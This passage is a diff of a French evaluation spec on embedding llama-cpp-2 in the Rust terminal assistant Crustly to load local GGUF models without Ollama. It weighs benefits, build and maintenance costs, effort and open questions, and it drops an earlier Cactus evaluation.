-  "dep:schemars"]` dans `Cargo.toml`, gaté de façon cohérente dans
-  `src/llm/provider/mod.rs` (`#[cfg(feature = "ollama")]`) et `factory.rs`
-  (y compris un stub no-op quand la feature est désactivée). Une nouvelle
-  feature `gguf`/`local-inference` suivrait exactement ce patron et
-  s'ajouterait à `all-llm`.
-- **Crabrace n'a pas de rôle ici** : le registre `crabrace.rs` modélise des
-  providers *joignables sur le réseau* (API cloud ou daemon local avec
-  surface HTTP) ; un moteur GGUF en process n'a pas de tel point d'entrée à
-  enregistrer — il contournerait Crabrace entièrement, comme le fait déjà
-  `QwenProvider` pour ses aspects spécifiques.
+- Nouveau provider (`src/llm/provider/gguf.rs`) : chargement du modèle,
+  création du contexte d'inférence, tokenisation, décodage par batch,
+  sampling (température/top-p/top-k, feature `sampler`), reconstruction de
+  `StreamEvent` token par token — sur le même patron que `stream()` dans
+  `ollama.rs` (ligne 543), qui est déjà le meilleur précédent en place pour
+  un backend local "from scratch" (accumulation des deltas, construction
+  manuelle de `MessageStart`/`ContentBlockDelta`/`MessageStop`).
+- **Tool/function calling à ré-implémenter** : `llama-cpp-2` ne fait aucune
+  hypothèse sur le format de sortie d'un modèle — contrairement à Ollama qui
+  gère aujourd'hui le tool-calling côté serveur. Deux options :
+  - reprendre l'approche heuristique déjà en place (`maybe_tool_call_json`/
+    `tool_call_from_content` dans `ollama.rs`, `ToolCallParser` de
+    `qwen.rs`) — coût de portage modéré, fiabilité identique à l'existant ;
+  - investir dans `llguidance` (génération contrainte par grammaire) pour
+    une fiabilité supérieure — coût d'intégration plus élevé (apprentissage
+    de l'API `llguidance`/`toktrie`, définition d'une grammaire JSON Schema
+    à partir des `Tool.input_schema` déjà génériques dans
+    `provider/types.rs`), mais bénéfice net réel (§4 point 6).
+- Gestion mémoire/concurrence : un modèle chargé occupe la RAM pendant toute
+  la durée de vie du process Crustly (ou nécessite une logique de
+  déchargement maison, ré-implémentant le `keep_alive` qu'Ollama gère
+  aujourd'hui) ; le décodage CPU doit être isolé dans une tâche
+  `tokio::task::spawn_blocking` pour ne pas geler la boucle d'événements TUI
+  pendant l'inférence — un risque absent aujourd'hui puisque l'inférence
+  tourne toujours dans un process séparé (Ollama).
+- **Gestion de catalogue/téléchargement de modèles** : avec un fichier
+  `.gguf` brut, la responsabilité de trouver, télécharger et vérifier
+  l'intégrité (checksum) du fichier revient entièrement à Crustly — Ollama
+  gère aujourd'hui cela via `ollama pull <repo:tag>`, déjà exposé dans
+  Crustly (`crustly ollama pull`, dialog TUI `Ctrl+D`, cf.
+  `ollama-rs-integration-plan.md` §5.7). Un provider GGUF natif perd cette
+  capacité sauf à la ré-implémenter (résolution d'URL HuggingFace,
+  téléchargement avec barre de progression, vérification de checksum).
 
-### 6.3 Maintenance long terme
+### 5.3 Maintenance long terme
 
-- Nouvelle surface de sécurité : parsing de fichiers binaires tiers
-  (`.gguf`) fournis par l'utilisateur, exécution de code natif C++ dans le
-  process — à contraster avec le modèle actuel où Ollama tourne en process
-  séparé (isolation naturelle des crashs/fuites mémoire du moteur
-  d'inférence).
-- Suivi des mises à jour de sécurité/performance de llama.cpp (dépendance
-  externe C++ à vendorer/mettre à jour manuellement, hors de l'écosystème
-  `cargo update`).
-- Tests CI : nécessite des runners avec un vrai modèle `.gguf` téléchargé
-  (même problème que documenté pour Ollama en §7 du plan d'intégration
-  `ollama-rs` — "test manuel local, non exécutable en CI" — mais en pire, car
-  il n'y a même plus de serveur à mocker/stubber facilement : c'est le moteur
-  d'inférence lui-même qu'il faudrait invoquer).
+- **Pas de SemVer strict** (assumé par les mainteneurs de `llama-cpp-rs`,
+  qui priorisent le suivi de `llama.cpp` en amont) : des mises à jour de
+  version peuvent introduire des changements d'API non annoncés par un bump
+  majeur classique — nécessite un pin de version plus prudent et une revue
+  de changelog à chaque mise à jour, contrairement aux autres dépendances du
+  projet qui suivent SemVer.
+- Nouvelle surface de sécurité : exécution de code natif C++ dans le même
+  process que le reste de l'application, sur un fichier binaire fourni par
+  l'utilisateur (`.gguf`) — à contraster avec le modèle actuel où Ollama
+  tourne en process séparé (isolation naturelle des crashs/fuites mémoire du
+  moteur d'inférence vis-à-vis du reste de Crustly : TUI, DB, exécution des
+  tools).
+- Dépendance C++ vendorée à suivre hors de l'écosystème `cargo update`
+  standard (mises à jour de sécurité/performance de `llama.cpp` en amont).
+- **Tests CI plus difficiles qu'avec Ollama** : le plan d'intégration
+  `ollama-rs` note déjà qu'un test contre un vrai serveur Ollama est "non
+  exécutable en CI" (test manuel local). Avec un moteur embarqué, il n'y a
+  même plus de serveur à mocker/stubber facilement pour les tests
+  d'intégration légers — il faudrait soit invoquer un vrai `.gguf` (poids de
+  plusieurs centaines de Mo minimum à héberger/télécharger en CI), soit se
+  limiter à des tests unitaires sur le mapping de types (comme
+  aujourd'hui), sans jamais exercer le chemin d'inférence réel en CI.
 
-### 6.4 Estimation d'effort (ordre de grandeur)
+### 5.4 Ce qui est perdu par rapport à Ollama
+
+- **Partage de modèle entre plusieurs process** : Ollama charge un modèle
+  une fois et sert plusieurs clients depuis le même processus serveur ; un
+  moteur embarqué dans Crustly rechargerait le modèle à chaque instance de
+  Crustly lancée (RAM et temps de démarrage multipliés par le nombre de
+  sessions concurrentes).
+- **Déchargement automatique par inactivité** (`keep_alive` d'Ollama) — à
+  réimplémenter côté Crustly si souhaité.
+- **Catalogue de modèles nommés** (`llama3.2:3b`, etc.) — avec un `.gguf`
+  brut, l'utilisateur gère lui-même ses fichiers, sans le confort d'un nom
+  court résolu automatiquement.
+
+---
+
+## 6. Estimation d'effort (ordre de grandeur)
 
 À titre de comparaison, l'intégration `ollama-rs` (client HTTP typé,
-documentée dans `ollama-rs-integration-plan.md`) a représenté 4 phases livrées
-progressivement. Un provider GGUF natif via `llama-cpp-2` couvre un
-périmètre fonctionnel comparable **plus** un moteur d'inférence embarqué :
+documentée dans `ollama-rs-integration-plan.md`) a représenté 4 phases
+livrées progressivement, sans aucun code d'inférence à écrire. Un provider
+GGUF natif via `llama-cpp-2` couvre un périmètre fonctionnel comparable
+**plus** un moteur d'inférence embarqué à intégrer, tester et maintenir :
 raisonnablement, **plusieurs semaines** de travail pour un MVP correct
-(chargement modèle, complétion, streaming, tool-calling basique), contre
-quelques jours pour un client HTTP vers un serveur déjà bâti et testé par une
-communauté large (Ollama). Le rapport effort/bénéfice n'est positif que si
-l'objectif "zéro dépendance de service externe" est une exigence dure (ex.
-distribution air-gapped, contrainte produit explicite) — pas une simple
-préférence de simplicité perçue.
+(build multi-plateforme, chargement modèle, complétion, streaming,
+tool-calling basique par heuristique texte), et significativement plus si
+`llguidance` est intégré dès le MVP plutôt que dans une itération
+ultérieure. Contre quelques jours pour un client HTTP vers un serveur déjà
+bâti et testé par une large communauté (Ollama).
+
+Le rapport effort/bénéfice n'est positif que si "zéro dépendance de service
+externe" est une **exigence produit dure** (usage air-gapped, distribution à
+des utilisateurs sans droits d'installation de service tiers) — pas une
+simple préférence de simplicité perçue, largement déjà couverte
+aujourd'hui par Ollama qui s'installe et démarre automatiquement en
+arrière-plan sur les trois plateformes cibles.
 
 ---
 
 ## 7. Tableau de synthèse
 
-| Option | Charge un `.gguf` sans conversion | Licence compatible | Effort | Recommandation |
-|---|---|---|---|---|
-| **Statu quo** (Ollama natif + compat OpenAI) | Non (délégué à Ollama) | ✅ | — | ✅ Conserver |
-| **Cactus** (`cactus-compute/cactus`) | ❌ conversion propriétaire requise | ❌ seuils financiers, résiliation auto | Moyen-élevé (FFI + toolchain native par plateforme) | ❌ Ne pas intégrer |
-| **`llama-cpp-2`** (bindings vers llama.cpp) | ✅ | ✅ MIT | Élevé (moteur natif embarqué) | ⚠️ Envisageable en ADR séparée + spike, seulement si "zéro dépendance externe" devient une exigence produit explicite |
+| Critère | Statu quo (Ollama natif + compat OpenAI) | `llama-cpp-2` (moteur embarqué) |
+|---|---|---|
+| Charge un `.gguf` sans conversion | Délégué à Ollama (oui, côté serveur) | ✅ natif, in-process |
+| Dépendance à un service externe | Oui (daemon Ollama) | ❌ aucune |
+| Licence | — | ✅ MIT OR Apache-2.0, compatible FSL-1.1-MIT |
+| Toolchain de build | `cargo build` seul | CMake + compilateur C++ requis |
+| Tool-calling | Géré côté serveur Ollama (+ heuristique texte côté Crustly) | À ré-implémenter (heuristique ou `llguidance`) |
+| Gestion catalogue/téléchargement modèles | ✅ déjà livré (`crustly ollama pull`, TUI) | À ré-implémenter |
+| Partage modèle multi-process | ✅ (un seul chargement, N clients) | ❌ (un chargement par instance Crustly) |
+| Isolation crash/mémoire du moteur d'inférence | ✅ (process séparé) | ❌ (même process que la TUI/DB) |
+| Effort d'intégration | Déjà fait | Plusieurs semaines (MVP) |
+| Testabilité CI | Limitée (test manuel documenté) | Plus limitée encore (pas de serveur à mocker) |
 
 ---
 
 ## 8. Questions ouvertes avant toute décision
 
 1. Le besoin "monolithique, pas de service externe" est-il une **contrainte
-   produit ferme** (ex. usage air-gapped, distribution à des utilisateurs
-   sans droits d'installation de service tiers) ou une **préférence de
-   confort** ? La réponse change complètement le calcul coût/bénéfice du §6.
-2. Si retenu, quel périmètre de backends est requis au lancement : CPU
-   seulement (plus simple, plus lent) ou CPU+GPU (CUDA/Metal, complexité de
-   build multipliée) ?
+   produit ferme** (usage air-gapped, distribution à des utilisateurs sans
+   droits d'installation de service tiers) ou une **préférence de confort** ?
+   La réponse change complètement le calcul coût/bénéfice du §6.
+2. Quel périmètre de backends est requis au lancement : CPU seulement (plus
+   simple à builder/tester, plus lent) ou CPU+GPU (CUDA/Metal, complexité de
+   build et matrice de test multipliées) ?
 3. Le tool/function calling (utilisé massivement par les 21+ tools de
    Crustly) est-il requis dès le MVP GGUF natif, ou une première version
    "chat simple, pas de tools" est-elle acceptable pour valider l'intérêt
    avant d'investir dans le parsing de tool calls sur un moteur brut ?
-4. Faut-il reconsidérer **Cactus spécifiquement** si l'équipe Cactus confirme
-   un chargement GGUF natif (sans conversion) dans une version future, et
-   clarifie une licence permissive pour usage embarqué en outil dev
-   redistribué publiquement ? (à re-vérifier périodiquement, pas d'action
-   immédiate).
+4. Faut-il viser `llguidance` (génération contrainte) dès le MVP, ou
+   commencer par l'heuristique texte déjà éprouvée dans `ollama.rs`/`qwen.rs`
+   et migrer plus tard si le besoin de fiabilité le justifie ?
+5. Le binaire par défaut de Crustly doit-il rester sans la feature `gguf`
+   (comme c'est le cas pour `ollama` aujourd'hui — optionnelle, pas dans
+   `default`), ou cette capacité est-elle jugée assez centrale pour changer
+   cette politique ?
+6. Qui gère la vérification d'intégrité (checksum) et la provenance des
+   fichiers `.gguf` fournis par l'utilisateur, sachant qu'ils sont exécutés
+   par du code natif dans le même process que le reste de l'application ?
 
 ---
 
 ## 9. Suite à donner
 
-Ce document est un **plan d'évaluation**, pas une décision. Si une direction
-est retenue à l'issue des questions du §8 :
+Ce document est un **plan d'évaluation**, pas une décision.
 
 - **Aucune décision** (statu quo) → rien à faire, ce document reste comme
   trace de l'évaluation.
-- **Décision d'intégrer un moteur GGUF natif** (`llama-cpp-2` ou équivalent)
-  → documenter le choix dans une ADR dédiée
+- **Décision d'intégrer `llama-cpp-2`** → recommandé de commencer par un
+  **spike technique isolé** (hors branche principale) : charger un petit
+  `.gguf` (ex. modèle 1-3B), obtenir une complétion et un streaming
+  fonctionnels, mesurer le temps de build à froid et la taille du binaire
+  réels sur les trois plateformes cibles, avant tout engagement sur le plan
+  complet. Documenter ensuite le choix dans une ADR dédiée
   `docs/architecture/decisions/0005-<titre>.md` (Context/Decision/
-  Consequences, cf. gabarit `0000-adr-template.md`), qui renverra vers ce
+  Consequences, cf. gabarit `0000-adr-template.md`) qui renverra vers ce
   fichier pour le détail — même articulation que l'ADR `0003` vers
-  `docs/guides/CRABRACE_INTEGRATION.md`. Le détail d'implémentation
-  suivrait ensuite le même triptyque que l'intégration Ollama :
-  plan d'intégration (ce document en tient lieu) → plan de test → guide
-  utilisateur (`docs/guides/`), sur le modèle de
+  `docs/guides/CRABRACE_INTEGRATION.md`. L'implémentation suivrait ensuite le
+  même triptyque que l'intégration Ollama : plan d'intégration détaillé →
+  plan de test → guide utilisateur (`docs/guides/`), sur le modèle de
   `ollama-rs-integration-plan.md` + `ollama-local-llm-test-plan.md` +
   `docs/guides/OLLAMA_GUIDE.md`.
 
@@ -403,10 +457,9 @@ est retenue à l'issue des questions du §8 :
 
 ## Sources consultées
 
-- [cactus-compute/cactus](https://github.com/cactus-compute/cactus) — README, structure du repo, bindings Rust
-- [cactuscompute.com/docs](https://docs.cactuscompute.com/v2.0.1/) — documentation produit
-- Licence Cactus Compute, Inc. (fichier `LICENSE` du dépôt)
-- `ollama-rs-integration-plan.md` (ce dépôt) — référence de comparaison d'effort
+- [utilityai/llama-cpp-rs](https://github.com/utilityai/llama-cpp-rs) — README, structure du dépôt, exemples
+- [llama-cpp-2 sur crates.io](https://crates.io/crates/llama-cpp-2) — version, licence, statistiques de téléchargement
+- `llama-cpp-2/Cargo.toml` et `llama-cpp-sys-2/build.rs` (dépôt `utilityai/llama-cpp-rs`) — features Cargo et logique de build CMake/Windows
+- `ollama-rs-integration-plan.md` (ce dépôt) — référence de comparaison d'effort et patrons d'implémentation (streaming, tool-calling heuristique, feature flags)
 - `docs/architecture/decisions/0003-crabrace-provider-registry.md` — architecture de découverte de providers existante
-- `src/llm/provider/trait.rs`, `Cargo.toml` (ce dépôt) — interface `Provider` et conventions de feature flags actuelles
-- Recherche web sur `llama-cpp-2`/`llama_cpp` (crates.io) comme alternative
+- `src/llm/provider/trait.rs`, `src/llm/provider/ollama.rs`, `src/config/mod.rs`, `Cargo.toml` (ce dépôt) — interface `Provider`, conventions de feature flags et écarts de schéma de configuration actuels

--- a/llm-file-gguf-support.md
+++ b/llm-file-gguf-support.md
@@ -1,41 +1,65 @@
 # Spécification d'évaluation : chargement direct de modèles GGUF via `llama-cpp-2`
 
-Statut : **Évaluation — aucune implémentation engagée**
+Statut : **Évaluation approfondie — aucune implémentation engagée**
 Date : 2026-07-21
-Portée : évaluer l'intégration de la crate
+Portée : étude complète des **bénéfices** d'intégrer la crate
 [`llama-cpp-2`](https://github.com/utilityai/llama-cpp-rs) (bindings Rust vers
 `llama.cpp`) pour permettre à Crustly de charger et exécuter un modèle depuis
-un fichier `.gguf` local, **sans dépendre d'un serveur Ollama externe**, dans
-l'objectif d'obtenir une application plus monolithique. Bénéfices et coûts
-évalués spécifiquement pour ce dépôt.
+un fichier `.gguf` local, **sans dépendre d'un serveur Ollama externe**, afin
+d'obtenir une application plus monolithique — avec un cadre de décision
+explicite Go/No-Go en fin de document.
 
 ---
 
 ## 0. Résumé exécutif
 
-`llama-cpp-2` est **techniquement le bon candidat** pour cet objectif : c'est
-un binding Rust direct vers l'implémentation de référence du format GGUF,
-publié sur crates.io, sous licence MIT OR Apache-2.0 (compatible avec la
-licence FSL-1.1-MIT de Crustly), maintenu activement (mise à jour début
-juillet 2026, 841 745 téléchargements cumulés, 615 ★ sur le dépôt source) et
-couvrant nativement tout ce qu'il faut : chargement `.gguf` sans conversion,
-backends CPU/CUDA/Metal/Vulkan, génération contrainte par grammaire
-(utile pour le tool-calling), et support multimodal (`mtmd`).
+`llama-cpp-2` est **techniquement le bon candidat** pour cet objectif :
+binding Rust direct vers l'implémentation de référence du format GGUF,
+publié sur crates.io, licence MIT OR Apache-2.0 (compatible avec la licence
+FSL-1.1-MIT de Crustly), maintenu activement (841 745 téléchargements
+cumulés, mise à jour début juillet 2026, 615 ★).
 
-**Mais ce n'est pas une intégration "légère".** Contrairement à l'intégration
-`ollama-rs` déjà livrée dans ce dépôt (un client HTTP typé vers un serveur
-qui fait tout le travail d'inférence), `llama-cpp-2` embarque le **moteur
-d'inférence natif C++ lui-même** dans le binaire de Crustly : compilation
-CMake d'un sous-module C++ à chaque build, gestion mémoire/concurrence du
-modèle dans le process TUI, ré-implémentation du cycle de vie et du
-tool-calling que le daemon Ollama gère aujourd'hui gratuitement. C'est un
-changement de nature du projet (client réseau → moteur d'inférence embarqué),
-pas une extension incrémentale.
+Sept bénéfices concrets et spécifiques à Crustly ressortent de cette étude
+(détail en §4) :
 
-**Recommandation : faisable et alignée techniquement, mais à traiter comme un
-projet séparé avec spike de validation avant tout engagement**, pas comme un
-ajout de provider ordinaire. Voir §7 pour le calcul coût/bénéfice détaillé et
-§9 pour la marche à suivre si retenue.
+1. **Alignement direct avec le positionnement produit** de Crustly
+   ("performance, memory efficiency, and reduced resource consumption" —
+   `CLAUDE.md`) : le daemon Ollama consomme ~1 Go de RAM au repos même sans
+   modèle chargé ([issue confirmée par les mainteneurs
+   d'Ollama](https://github.com/ollama/ollama/issues/7168)), plus l'empreinte
+   complète du modèle tant que `keep_alive` ne l'a pas déchargé — un second
+   processus permanent qui va à l'encontre de l'argument de vente principal
+   de Crustly face à des outils plus lourds.
+2. **Élimination d'une dépendance de service externe**, seul chemin viable
+   dans les environnements air-gapped, les postes contraints par une
+   politique IT interdisant les daemons tiers, et les pipelines CI/CD
+   éphémères.
+3. **Fiabilité du tool-calling supérieure** via génération contrainte par
+   grammaire (GBNF/`llguidance`) — élimine structurellement les erreurs de
+   syntaxe JSON que l'heuristique actuelle de récupération de texte
+   (`ollama.rs` lignes 607-655) ne fait que *rattraper après coup*.
+4. **Support multimodal natif** (`mtmd`), sans régression face à
+   Ollama/OpenAI-compat.
+5. **Onboarding utilisateur simplifié** : un seul binaire, une seule
+   commande, pas de "d'abord installer et démarrer Ollama".
+6. **Différenciation compétitive** face aux autres assistants IA terminal,
+   qui délèguent tous l'inférence locale à un daemon externe.
+7. **Contrôle total du cycle de vie du modèle**, sans dépendre du
+   comportement/des choix de configuration d'un processus tiers.
+
+Ces bénéfices sont réels mais **conditionnels** : ils ne se matérialisent
+que si les coûts identifiés en §5 (toolchain de build C++/CMake, ré-
+implémentation du tool-calling et de la gestion de modèles, isolation
+process perdue, plusieurs semaines d'effort) sont acceptés. Le §6 fournit un
+cadre de décision explicite pour trancher Go/No-Go selon les priorités
+produit réelles de Crustly.
+
+**Recommandation** : **GO conditionnel** — voir la grille de décision §6.
+L'intégration est justifiée si au moins un des critères "durs" (contrainte
+air-gapped/IT, ou fiabilité du tool-calling jugée insuffisante aujourd'hui)
+s'applique ; sinon, le rapport effort/bénéfice penche pour un **NO-GO à ce
+stade**, avec réévaluation possible si l'un de ces critères apparaît plus
+tard.
 
 ---
 
@@ -54,21 +78,13 @@ il délègue entièrement l'inférence (lecture du `.gguf`, dé-quantization au
 runtime, kernels CPU/GPU, gestion mémoire du KV-cache) à un processus tiers.
 C'est ce qui rend l'intégration `ollama-rs` relativement légère (voir
 `ollama-rs-integration-plan.md`, ~700 lignes de plan pour un client HTTP
-typé) : aucun code d'inférence, uniquement du mapping requête/réponse.
+typé) : aucun code d'inférence, uniquement du mapping requête/réponse — mais
+c'est aussi précisément ce qui *coûte* en ressources et en dépendance
+externe, matière du §4.
 
 L'idée évaluée ici change de nature : **faire tourner l'inférence dans le
 process Crustly lui-même**, en lisant un fichier `.gguf` directement depuis
 le disque, sans dépendre d'aucun serveur externe démarré au préalable.
-Objectif déclaré : une distribution plus monolithique (un seul binaire, une
-seule installation, pas de service tiers à gérer).
-
-Le format GGUF est un conteneur binaire (métadonnées + tenseurs quantifiés).
-Le "lire" ne suffit pas : il faut aussi **exécuter** le modèle — désérialiser
-les tenseurs, dé-quantifier, faire tourner les kernels matmul/attention,
-gérer le KV-cache et la fenêtre de contexte, tokenizer le texte. C'est un
-moteur d'inférence complet, pas un parseur de fichier. `llama-cpp-2` fournit
-exactement ce moteur en embarquant `llama.cpp` (la référence C++ du
-domaine) via FFI.
 
 ---
 
@@ -77,41 +93,26 @@ domaine) via FFI.
 ### 2.1 Composition et provenance
 
 Le dépôt [`utilityai/llama-cpp-rs`](https://github.com/utilityai/llama-cpp-rs)
-publie deux crates complémentaires sur crates.io :
-
-- **`llama-cpp-2`** — API Rust de haut niveau (modèle, contexte, batch,
-  sampling, tokenisation).
-- **`llama-cpp-sys-2`** — bindings FFI bruts, générés par `bindgen`, qui
-  compilent le sous-module Git vendoré de `llama.cpp` via la crate `cmake`
-  au moment du `cargo build`.
-
-Design assumé par les mainteneurs : rester "aussi proche que possible des
-bindings bruts" et "aussi à jour que possible avec `llama.cpp`" —
-**explicitement pas suivi en SemVer strict** (versionnage actuel :
-`llama-cpp-2` v0.1.151, `llama-cpp-sys-2` v0.1.152). C'est un point à noter
-pour la maintenance long terme (§6.3).
+publie deux crates sur crates.io : **`llama-cpp-2`** (API Rust de haut
+niveau) et **`llama-cpp-sys-2`** (bindings FFI bruts, `bindgen`, compile le
+sous-module vendoré `llama.cpp` via la crate `cmake` au moment du `cargo
+build`). Design assumé : rester proche des bindings bruts et "aussi à jour
+que possible avec `llama.cpp`" — **explicitement pas suivi en SemVer
+strict** (versionnage actuel : `llama-cpp-2` v0.1.151).
 
 ### 2.2 Licence
 
 `MIT OR Apache-2.0` — pleinement compatible avec la licence FSL-1.1-MIT de
-Crustly (`Cargo.toml` ligne 7), sans aucune des contraintes commerciales
-qu'aurait posées une dépendance sous licence propriétaire. Aucun blocage
-juridique de ce côté.
+Crustly (`Cargo.toml` ligne 7). Aucun blocage juridique.
 
 ### 2.3 Maturité
 
-- 841 745 téléchargements cumulés sur crates.io, 430 790 sur la période
-  récente (signal d'usage actif, pas seulement historique).
-- 615 ★ / 218 forks sur GitHub, 151 versions publiées, dernière mise à jour
-  début juillet 2026 — mis à jour au fil des sorties de `llama.cpp`.
-- 33 issues ouvertes, 12 PR en cours — niveau d'activité de mainteneur sain
-  pour une crate de cette taille.
-- Créée en janvier 2024, donc ~2,5 ans d'historique au moment de cette
-  évaluation.
+841 745 téléchargements cumulés sur crates.io (430 790 récents), 615 ★ / 218
+forks, 151 versions publiées, dernière mise à jour début juillet 2026, 33
+issues ouvertes / 12 PR en cours — niveau d'activité sain, ~2,5 ans
+d'historique.
 
 ### 2.4 Fonctionnalités couvertes (features Cargo)
-
-Extrait du `Cargo.toml` de `llama-cpp-2` :
 
 ```toml
 [features]
@@ -130,328 +131,332 @@ dynamic-link = ["llama-cpp-sys-2/dynamic-link"]
 system-ggml = ["llama-cpp-sys-2/system-ggml"]
 ```
 
-Deux features méritent une mention particulière dans le contexte de
-Crustly :
-
-- **`mtmd`** (multimodal) : correspondrait à `Provider::supports_vision()`
-  dans le trait actuel (`src/llm/provider/trait.rs` ligne 42) — utile car
-  Ollama/OpenAI-compat gèrent déjà la vision aujourd'hui, une intégration
-  GGUF native sans cette feature serait une régression fonctionnelle.
-- **`llguidance`** (via `llguidance`/`toktrie`, la bibliothèque de génération
-  contrainte par grammaire) : permettrait de forcer la sortie du modèle à
-  respecter un schéma JSON — une alternative potentiellement **plus fiable**
-  que l'heuristique actuelle de récupération de tool calls imprimés en texte
-  brut (`maybe_tool_call_json`/`tool_call_from_content` dans `ollama.rs`
-  lignes 607-655, et le `ToolCallParser` dédié de `qwen.rs`). C'est un
-  bénéfice réel et spécifique à cette crate, pas juste une parité avec
-  l'existant.
-
-### 2.5 Exemples fournis (repère pour l'API)
-
-Le dépôt fournit des exemples couvrant : `simple` (chargement modèle +
-complétion), `embeddings`, `mtmd` (multimodal), `reranker`, `llguidance.rs`
-(génération contrainte), `usage.rs`. L'exemple `simple` démontre le
-chargement direct d'un `.gguf` quantifié (`Q4_K_M`, `Q6_K`) téléchargé depuis
-HuggingFace — confirmant le chargement natif visé par cette évaluation, sans
-étape de conversion.
+Exemples fournis dans le dépôt : `simple` (chargement `.gguf` quantifié
+`Q4_K_M`/`Q6_K` depuis HuggingFace + complétion), `embeddings`, `mtmd`,
+`reranker`, `llguidance.rs` (génération contrainte), `usage.rs` — confirment
+un chargement natif sans étape de conversion.
 
 ---
 
 ## 3. Alignement avec l'architecture Crustly actuelle
 
-### 3.1 Le trait `Provider` s'y prête sans modification
-
 `src/llm/provider/trait.rs` (lignes 18-65) définit une interface
 agnostique du transport : `complete()`, `stream()`,
 `supports_streaming/tools/vision()`, `name()`, `default_model()`,
 `context_window()`, `calculate_cost()`. Un provider GGUF natif
-(`src/llm/provider/gguf.rs`, nouveau fichier) implémenterait ce même trait,
-câblé dans `factory.rs` exactement comme `try_create_ollama()` l'est
-aujourd'hui — **aucune modification du trait n'est nécessaire**, contrainte
-de compatibilité déjà respectée par construction.
-
-`calculate_cost()` retournerait simplement `0.0` (pas d'appel API payant,
-comme c'est déjà implicitement le cas pour un modèle local).
-
-### 3.2 Écart de schéma de configuration à combler
+implémenterait ce même trait, câblé dans `factory.rs` comme
+`try_create_ollama()` l'est déjà — **aucune modification du trait requise**.
 
 `ProviderConfig` générique (`src/config/mod.rs` ligne 346) ne connaît qu'un
-`default_model: String` — un nom résolu par un serveur distant, jamais un
-chemin de fichier local. Aucun champ existant pour un chemin `.gguf`, un
-nombre de threads CPU, un nombre de couches déportées sur GPU
-(`n_gpu_layers`), ou une taille de contexte propre à un fichier modèle donné.
-Il faudrait un nouveau type de configuration, sur le modèle
-d'`OllamaModelConfig` (`src/config/mod.rs` ligne 499, réglages par modèle) ou
-de `QwenProviderConfig` (ligne 366, précédent le plus proche pour un
-déploiement local avec réglages bas niveau) :
-
-```rust
-pub struct GgufProviderConfig {
-    pub model_path: PathBuf,       // chemin vers le fichier .gguf
-    pub n_ctx: Option<u32>,        // taille de contexte (par défaut celle du modèle)
-    pub n_threads: Option<u32>,    // threads CPU pour le décodage
-    pub n_gpu_layers: Option<u32>, // couches déportées sur GPU (0 = CPU only)
-    // pas de champ "quantization" : intrinsèque au fichier .gguf choisi
-}
-```
-
-### 3.3 Crabrace n'a aucun rôle ici
-
-Le registre `crabrace.rs` (§0003 des ADR) modélise des providers
-**joignables sur le réseau** (API cloud ou daemon local avec surface HTTP).
-Un moteur GGUF en process n'a pas de tel point d'entrée à enregistrer — il
-contournerait Crabrace entièrement, comme le fait déjà `QwenProvider` pour
-ses aspects spécifiques. Pas d'implication architecturale au-delà de ce
-constat.
-
-### 3.4 Précédent de feature flag à suivre
-
-`ollama = ["dep:ollama-rs", "dep:schemars"]` dans `Cargo.toml`, gaté de façon
-cohérente dans `src/llm/provider/mod.rs` (`#[cfg(feature = "ollama")]`) et
-`factory.rs` (avec un stub no-op quand la feature est désactivée). Une
-nouvelle feature `gguf` suivrait exactement ce patron :
-
-```toml
-[dependencies]
-llama-cpp-2 = { version = "0.1", optional = true, features = ["openmp"] }
-
-[features]
-gguf = ["dep:llama-cpp-2"]
-all-llm = ["openai", "aws-bedrock", "ollama", "gguf"]
-```
-
-Optionnelle par défaut, cohérent avec la volonté actuelle de ne pas alourdir
-le binaire par défaut (déjà la politique retenue pour `ollama`, cf. point
-ouvert §9 de `ollama-rs-integration-plan.md`).
+`default_model: String` (nom résolu à distance), pas un chemin de fichier —
+un nouveau `GgufProviderConfig` (`model_path`, `n_ctx`, `n_threads`,
+`n_gpu_layers`) serait nécessaire, sur le modèle d'`OllamaModelConfig`
+(ligne 499) ou `QwenProviderConfig` (ligne 366). Le registre `crabrace.rs`
+n'a aucun rôle ici (il modélise des providers joignables sur le réseau) — un
+moteur GGUF en process le contournerait entièrement.
 
 ---
 
-## 4. Bénéfices
+## 4. Étude complète des bénéfices
 
-1. **Chargement `.gguf` natif, sans conversion.** Contrairement à toute
-   solution qui imposerait un format propriétaire intermédiaire,
-   `llama-cpp-2` lit directement le format GGUF de référence — n'importe
-   quel fichier `.gguf` déjà téléchargé (HuggingFace, `ollama pull` puis
-   export, etc.) est utilisable tel quel.
-2. **Zéro dépendance de service externe.** Plus besoin qu'Ollama (ou un
-   autre serveur) tourne en arrière-plan ; un utilisateur avec un fichier
-   `.gguf` sur disque peut lancer Crustly directement, y compris en
-   environnement air-gapped/restreint où l'installation d'un daemon tiers
-   n'est pas possible.
-3. **Distribution monolithique.** Un seul binaire à installer (au prix d'une
-   taille sensiblement plus grande, voir §5.1).
-4. **Contrôle fin du cycle de vie du modèle** dans le process Crustly
-   (chargement, déchargement, paramètres d'inférence bas niveau) sans passer
-   par l'API HTTP d'un tiers.
-5. **Backends matériels larges** : CPU (avec OpenMP), CUDA, Metal (macOS),
-   Vulkan, ROCm, OpenCL, MKL — couvre l'essentiel du matériel visé par les
-   utilisateurs desktop de Crustly (Linux/macOS/Windows, x86_64/arm64),
-   contrairement à un moteur mobile-first limité à ARM NEON/Metal.
-6. **Génération contrainte par grammaire (`llguidance`)** — un gain
-   fonctionnel *au-delà* de la simple parité avec Ollama : une sortie JSON
-   garantie valide au niveau du décodage token-par-token serait plus fiable
-   que l'heuristique actuelle de récupération de tool calls textuels
-   (`ollama.rs` lignes 607-655), pour peu que le travail d'intégration soit
-   fait (§5.2).
-7. **Support multimodal (`mtmd`)** disponible nativement, évitant une
-   régression de fonctionnalité par rapport à Ollama/OpenAI-compat qui
-   supportent déjà la vision.
-8. **Latence de démarrage** potentiellement meilleure pour un usage
-   ponctuel/CLI (pas de round-trip HTTP, pas de "cold start" d'un service
-   externe) — à mesurer concrètement, le chargement mmap d'un gros `.gguf`
-   restant coûteux dans tous les cas.
+### 4.1 Alignement avec le positionnement produit de Crustly
+
+C'est le bénéfice le plus spécifique à ce projet précis, et le plus souvent
+absent d'une évaluation générique de `llama-cpp-2`. `CLAUDE.md` définit
+Crustly comme : *"a high-performance terminal AI assistant... with focus on
+performance, memory efficiency, and reduced resource consumption"*. Or,
+l'usage local actuel repose entièrement sur un **second processus
+permanent** (le daemon Ollama) :
+
+- Un [rapport de bug confirmé côté mainteneurs d'Ollama](https://github.com/ollama/ollama/issues/7168)
+  documente une empreinte mémoire du processus Ollama d'**environ 1 Go au
+  repos**, y compris sans aucun modèle chargé, du fait des "embedded
